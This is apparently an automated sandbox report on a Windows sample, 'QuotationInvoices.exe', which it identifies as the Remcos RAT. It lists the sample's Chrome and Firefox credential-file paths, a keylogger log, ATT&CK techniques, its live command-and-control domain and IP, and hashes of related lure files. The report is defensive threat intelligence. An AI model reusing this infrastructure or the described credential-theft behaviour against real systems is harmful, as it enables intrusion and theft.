Process created: C:\Users\user\Desktop\QuotationInvoices.exe 'C:\Users\user\Desktop\QuotationInvoices.exe'

Jump to behavior

Source: QuotationInvoices.exe, 00000001.00000002.919576145.0000000000C90000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: QuotationInvoices.exe, 00000001.00000002.919576145.0000000000C90000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: QuotationInvoices.exe, 00000001.00000002.919576145.0000000000C90000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: logs.dat.1.dr	Binary or memory string: [ Program Manager ]
Source: QuotationInvoices.exe, 00000001.00000002.919576145.0000000000C90000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_0042F055 cpuid

1_2_0042F055

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: GetLocaleInfoA,	1_2_0040D3AD
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	1_2_00448638
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: EnumSystemLocalesW,	1_2_00440681
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: EnumSystemLocalesW,	1_2_004488FB
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: EnumSystemLocalesW,	1_2_004488B0
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: EnumSystemLocalesW,	1_2_00448996
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_00448A23
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: GetLocaleInfoW,	1_2_00440B6A
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: GetLocaleInfoW,	1_2_00448C73
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_00448D9C
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: GetLocaleInfoW,	1_2_00448EA3
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_00448F70
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: GetLocaleInfoA,	1_1_0040D3AD

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_0042F25B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_0042F25B

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_00416790 GetComputerNameExW,GetUserNameW,

1_2_00416790

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_0044143E _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

1_2_0044143E

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403486

Stealing of Sensitive Information:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.667197281.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.919352966.0000000000487000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QuotationInvoices.exe PID: 7072, type: MEMORY
Source: Yara match	File source: Process Memory Space: QuotationInvoices.exe PID: 7036, type: MEMORY
Source: Yara match	File source: 1.2.QuotationInvoices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.QuotationInvoices.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.QuotationInvoices.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QuotationInvoices.exe.2a70000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QuotationInvoices.exe.2a70000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.QuotationInvoices.exe.400000.0.unpack, type: UNPACKEDPE

Contains functionality to steal Chrome passwords or cookies

Show sources

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

1_2_00409EAC

Contains functionality to steal Firefox passwords or cookies

Show sources

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		1_2_00409FCA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: \key3.db		1_2_00409FCA

Remote Access Functionality:

Detected Remcos RAT

Show sources

Source: QuotationInvoices.exe, 00000000.00000002.667197281.0000000002A70000.00000004.00000001.sdmp	String found in binary or memory: Remcos_Mutex_Inj
Source: QuotationInvoices.exe, 00000000.00000002.667197281.0000000002A70000.00000004.00000001.sdmp	String found in binary or memory: \|licence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.0 Prov
Source: QuotationInvoices.exe	String found in binary or memory: Remcos_Mutex_Inj
Source: QuotationInvoices.exe, 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: \|licence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.0 Prov

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.667197281.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.919352966.0000000000487000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QuotationInvoices.exe PID: 7072, type: MEMORY
Source: Yara match	File source: Process Memory Space: QuotationInvoices.exe PID: 7036, type: MEMORY
Source: Yara match	File source: 1.2.QuotationInvoices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.QuotationInvoices.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.QuotationInvoices.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QuotationInvoices.exe.2a70000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QuotationInvoices.exe.2a70000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.QuotationInvoices.exe.400000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: cmd.exe		1_2_004054A8
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: cmd.exe		1_1_004054A8

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer21	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Command and Scripting Interpreter12	Windows Service1	Access Token Manipulation1	Obfuscated Files or Information3	Input Capture111	Account Discovery1	Remote Desktop Protocol	Input Capture111	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Service Execution2	Logon Script (Windows)	Windows Service1	Software Packing21	Credentials In Files2	System Service Discovery1	SMB/Windows Admin Shares	Clipboard Data2	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection222	Masquerading1	NTDS	File and Directory Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion2	LSA Secrets	System Information Discovery34	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Security Software Discovery3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol11	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection222	DCSync	Virtualization/Sandbox Evasion2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	Remote System Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
QuotationInvoices.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\nsc875C.tmp\System.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsc875C.tmp\System.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\nsc875C.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.QuotationInvoices.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
1.0.QuotationInvoices.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
0.0.QuotationInvoices.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File

Domains

Source	Detection	Scanner	Label	Link
greatglass.servebeer.com	5%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
greatglass.servebeer.com	5%	Virustotal		Browse
greatglass.servebeer.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
greatglass.servebeer.com	194.5.97.248	true	true	5%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
greatglass.servebeer.com	true	5%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	QuotationInvoices.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	QuotationInvoices.exe	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.97.248	unknown	Netherlands		208476	DANILENKODE	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356046
Start date:	22.02.2021
Start time:	13:56:47
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	QuotationInvoices.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/5@53/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 16% (good quality ratio 15.4%) Quality average: 83.5% Quality standard deviation: 24.9%
HCA Information:	Successful, ratio: 72% Number of executed functions: 53 Number of non-executed functions: 214
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 104.43.193.48, 51.104.144.132, 204.79.197.200, 13.107.21.200, 168.61.161.212, 23.211.6.115, 8.248.137.254, 8.248.135.254, 8.248.117.254, 8.248.115.254, 8.253.204.249, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 51.104.139.180 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:57:43	API Interceptor	1041x Sleep call for process: QuotationInvoices.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
194.5.97.248	PurchaseOrdersCSTtyres004786587.exe	Get hash	malicious	Browse
	QuotationCVXpo00029392.exe	Get hash	malicious	Browse
	51MRQ TECH DATA -RFQ - SPECIFICATIONS -CHECK LIST.exe	Get hash	malicious	Browse
	42MRQ TECH DATA -RFQ - SPECIFICATIONS -CHECK LIST.exe	Get hash	malicious	Browse
	41BURULLUS - EPC WORKS FOR ROSETTA SHARING FACILITIES - PROJECT.exe	Get hash	malicious	Browse
	45MRQ TECH DATA -RFQ - SPECIFICATIONS -CHECK LIST.exe	Get hash	malicious	Browse
	44BURULLUS - EPC WORKS FOR ROSETTA SHARING FACILITIES - PROJECT.exe	Get hash	malicious	Browse
	14MRQ TECH DATA -RFQ - SPECIFICATIONS -CHECK LIST.exe	Get hash	malicious	Browse
	13BURULLUS - EPC WORKS FOR ROSETTA SHARING FACILITIES - PROJECT.exe	Get hash	malicious	Browse
	33BURULLUS - EPC WORKS FOR ROSETTA SHARING FACILITIES - PROJECT.exe	Get hash	malicious	Browse
	8MRQ TECH DATA -RFQ - SPECIFICATIONS -CHECK LIST.exe	Get hash	malicious	Browse
	7BURULLUS - EPC WORKS FOR ROSETTA SHARING FACILITIES - PROJECT.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
greatglass.servebeer.com	PurchaseOrdersCSTtyres004786587.exe	Get hash	malicious	Browse	194.5.97.248
greatglass.servebeer.com	QuotationCVXpo00029392.exe	Get hash	malicious	Browse	194.5.97.248

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DANILENKODE	PAYMENT_.EXE	Get hash	malicious	Browse	194.5.98.211
	payment.exe	Get hash	malicious	Browse	194.5.98.66
	RFQ_1101983736366355 1101938377388.exe	Get hash	malicious	Browse	194.5.98.21
	Slip copy .xls.exe	Get hash	malicious	Browse	194.5.97.116
	Scan0059.pdf.exe	Get hash	malicious	Browse	194.5.97.34
	DHL AWB # 6008824216.png.exe	Get hash	malicious	Browse	194.5.97.48
	Scan0019.exe	Get hash	malicious	Browse	194.5.97.34
	PurchaseOrdersCSTtyres004786587.exe	Get hash	malicious	Browse	194.5.97.248
	Invoice467972.jar	Get hash	malicious	Browse	194.5.97.18
	Invoice467972.jar	Get hash	malicious	Browse	194.5.97.18
	Hk6Im7DPON.exe	Get hash	malicious	Browse	194.5.98.107
	Zfpmspqv.exe	Get hash	malicious	Browse	194.5.97.21
	Notification of payment.exe	Get hash	malicious	Browse	194.5.97.92
	Zv3r4M6NeJOSoDQ.exe	Get hash	malicious	Browse	194.5.98.26
	MT0128.jar	Get hash	malicious	Browse	194.5.97.18
	MT0128.jar	Get hash	malicious	Browse	194.5.97.18
	Orden.exe	Get hash	malicious	Browse	194.5.97.8
	DHL_6368638172 receipt document,pdf.exe	Get hash	malicious	Browse	194.5.97.21
	tax-irs.exe	Get hash	malicious	Browse	194.5.97.232
	a34b93ef-dea2-45f8-a5bf-4f6b0b5291c7.exe	Get hash	malicious	Browse	194.5.97.207

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsc875C.tmp\System.dll	PO.exe	Get hash	malicious	Browse
	SecuriteInfo.com.TrojanSpy.MSIL.Agent.22886.exe	Get hash	malicious	Browse
	SecuriteInfo.com.FileRepMalware.24882.exe	Get hash	malicious	Browse
	PDF_doc.exe	Get hash	malicious	Browse
	09000000000000.jar	Get hash	malicious	Browse
	quotation10204168.dox.xlsx	Get hash	malicious	Browse
	notice of arrivalpdf.exe	Get hash	malicious	Browse
	R5BNZ68i0f.exe	Get hash	malicious	Browse
	payment.exe	Get hash	malicious	Browse
	notice of arrival.xlsx	Get hash	malicious	Browse
	Invoice Overdue.exe	Get hash	malicious	Browse
	Invoice Overdue.exe	Get hash	malicious	Browse
	CHEQUE COPY RECEIPT.exe	Get hash	malicious	Browse
	Remittance copy.xlsx	Get hash	malicious	Browse
	CI + PL.xlsx	Get hash	malicious	Browse
	RFQ_Enquiry_0002379_.xlsx	Get hash	malicious	Browse
	QUOTATION.exe	Get hash	malicious	Browse
	AgroAG008021921doc_pdf.exe	Get hash	malicious	Browse
	CHEQUE COPY.exe	Get hash	malicious	Browse
	Bank Details.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsc875C.tmp\System.dll Download File
Process:	C:\Users\user\Desktop\QuotationInvoices.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.855045165595541
Encrypted:	false
SSDEEP:	192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
MD5:	FCCFF8CB7A1067E23FD2E2B63971A8E1
SHA1:	30E2A9E137C1223A78A0F7B0BF96A1C361976D91
SHA-256:	6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
SHA-512:	F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: PO.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.TrojanSpy.MSIL.Agent.22886.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.FileRepMalware.24882.exe, Detection: malicious, Browse Filename: PDF_doc.exe, Detection: malicious, Browse Filename: 09000000000000.jar, Detection: malicious, Browse Filename: quotation10204168.dox.xlsx, Detection: malicious, Browse Filename: notice of arrivalpdf.exe, Detection: malicious, Browse Filename: R5BNZ68i0f.exe, Detection: malicious, Browse Filename: payment.exe, Detection: malicious, Browse Filename: notice of arrival.xlsx, Detection: malicious, Browse Filename: Invoice Overdue.exe, Detection: malicious, Browse Filename: Invoice Overdue.exe, Detection: malicious, Browse Filename: CHEQUE COPY RECEIPT.exe, Detection: malicious, Browse Filename: Remittance copy.xlsx, Detection: malicious, Browse Filename: CI + PL.xlsx, Detection: malicious, Browse Filename: RFQ_Enquiry_0002379_.xlsx, Detection: malicious, Browse Filename: QUOTATION.exe, Detection: malicious, Browse Filename: AgroAG008021921doc_pdf.exe, Detection: malicious, Browse Filename: CHEQUE COPY.exe, Detection: malicious, Browse Filename: Bank Details.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir.-.D.-.D.-.D...J..D.-.E.>.D......D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..\|....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsh872C.tmp Download File
Process:	C:\Users\user\Desktop\QuotationInvoices.exe
File Type:	data
Category:	dropped
Size (bytes):	504230
Entropy (8bit):	7.974803391738096
Encrypted:	false
SSDEEP:	6144:laXlqi0/y4lwKzPHdRAFexzsJ/PvzFjBTkBVg90SS6+qLHmFAgOSqxn+8fp2zwIL:yWySRbHdRAF8zQNVk80QSF3qVLUMXO
MD5:	1A5019ACCB8B2C592D98DDCA4D53EA6E
SHA1:	64EB9F091F2A25E64FE5DC52F614499BBBA755AA
SHA-256:	C4F464C4A1CEFF309A6388157AB9FBF26A795C6F5E770D4929892C1A92FFB68E
SHA-512:	9A8EDE65C20C9B24ECC3F72FFB4AB1003A7514596175A067BC006D0BF9BB66BBEAF02EFD82ADA1C1C460F114561972F8F98A94738E84B9FA5E82A0A564A9C00E
Malicious:	false
Reputation:	low
Preview:	........,...................$...............................................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\okqry.a Download File
Process:	C:\Users\user\Desktop\QuotationInvoices.exe
File Type:	data
Category:	dropped
Size (bytes):	465408
Entropy (8bit):	7.999601945479521
Encrypted:	true
SSDEEP:	6144:Q/y4lwKzPHdRAFexzsJ/PvzFjBTkBVg90SS6+qLHmFAgOSqxn+8fp2zwI2P8LQ5:cySRbHdRAF8zQNVk80QSF3qVLUMX/
MD5:	96876AE06A1E7B087CA4B25713691E25
SHA1:	EB0C572D4DBD1303BCC20D5E13CA1B5DA6851980
SHA-256:	5144E9DBA5EE3C3CB46706B8095D6EAA2C1AA0D48B4016ECB03CABB844D8EA36
SHA-512:	B6F409C132903A752BC10FE083FF5D53366FC22C81DBAF1D7C737DD2F03D1E1A24F8DCA380BFD784232F79EDAB40E803E0AAB6386C4F4DF291E9AE4CC6793FC9
Malicious:	false
Reputation:	low
Preview:	..I..[..k.m..F....jq..#.f.........0.......U6./h.NL...!........f.n.+.`~..Y.;f.U.{..p,..g...U..C...V...$..F.d......Z...'....=.:T.M...!..W..]. ..C.lt..#.s...X.....k"<.k.)a.....H..O..F..:.nx..r...D.u"..c...o..g....T...d.W...J..im.....@W<v...15....JH.......w......7jYJ.X..>..]}...5...Z.k..6.9<..OZ.\|...............=...T.}............y...5...L.?....R..S=..\....Z..>..E.......a..Fp.....7..Lu.wW.$.>....~.)..S.np.:..S....?.F...-........v{.k(iB.c. ...LYKE..-......s.pq..~{....g.....@.N@.<.....N...$/7)v..n.Q..'..F.h.d\|.El...Hy..G...yu.z...... :e..m.2.?......P.z h.j=. h...s..{...h.W.._).FT.w..-4Z{]Z...D.ZT.F..^w7..5b.6\...dC2'..1....c.R~<rL.U7..R~.h.......5.....4......\|.../p...<#.O...3..W..n.".e..7V.y.....K..\7AD`....IhZ"~6...B2........B........p...7.0...F.J.:..?.j...c.u.B.F:Ka.n.y.].`.s,.......G\:q.d.1.p..\.....B.e...\|.$d.....a$_b.T....X)..D.zxp.Q7.3..T.U.U5$.Y..8a2...8..k.......(2q2I.4.....G7[f....J.e..$...-z?..G..G/..(H.Wb.....tX}O.W.

C:\Users\user\AppData\Local\Temp\xmtfn.dll Download File
Process:	C:\Users\user\Desktop\QuotationInvoices.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	7.589805073051753
Encrypted:	false
SSDEEP:	384:qlpTPQpU2T5eiynNSnAouNfxkSa598ZHWZoujzWxy9sp/x:6hPv29XiSnApNftS9aWZoujzWxX/x
MD5:	7B57E6D08CC3767914CA51A604BC6D13
SHA1:	AFE12DBF77D6FBCF8960D5761699D821AFCCB2B2
SHA-256:	29E898A600F9A16D828D355709391981396735139E3A8FDB6ADDA75F0AFC670B
SHA-512:	106CEEE1485DE5ABC7E977BE4CB17E388D1ECB54FCCD1B3ADD75AFC2A5625A81416998E8E9822DF8485CA8265FDA804826D308C2CF27DE2667EA80A359D823C0
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............e.J.e.J.e.J.e.J.e.JI..J.e.J..{J.e.J...J.e.J..\|J.e.J..yJ.e.JRich.e.J........PE..L.....3`...........!.........T............... .......................................................................$..I.... ....................................................................................... ...............................text...F........................... ..`.rdata....... ......................@..@.data....J...0...L..................@....rsrc................Z..............@..@................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\remcos\logs.dat Download File
Process:	C:\Users\user\Desktop\QuotationInvoices.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	74
Entropy (8bit):	4.716474907822009
Encrypted:	false
SSDEEP:	3:ttUHrCqDDIrA4RXMRPHv31aeo:tmcXqdHv3IP
MD5:	BD035BD4CCB00A887A17BA7CDE17D115
SHA1:	FCD6C75314E60CC8B7329184C4E866C783D66664
SHA-256:	9AFCF5D6F8CF2857C5DCD6C3B7C991F1BF3E41FFEFDA08F1DFC6E4BD75CD34E7
SHA-512:	22F353D48726C12134A9D1911FE299DB6D852D7D13110AA62AB5849B82386D058E452250D99849F3B93CADFEEBB9F04F41B611A5FCD67E643E13F0E81E49F924
Malicious:	true
Reputation:	low
Preview:	..[2021/02/22 13:57:43 Offline Keylogger Started]....[ Program Manager ]..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.974691206115224
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	QuotationInvoices.exe
File size:	528567
MD5:	9c51e2991c6c9708d783aab030dcc0da
SHA1:	64accc9e3f84e7365d8236c580b9644427e3f9e3
SHA256:	572a6a6fa5277c2b4cc040710694d33b2def62ab74e2801893d33e92e7b105af
SHA512:	c8725d2abba8f2ae1c483d948f2909ff73736e4efa415d6a26f91cf2226431720b13f15868b4177d8b581287a1d41c4c051913a0faf8f95f599f14b5133ab5b0
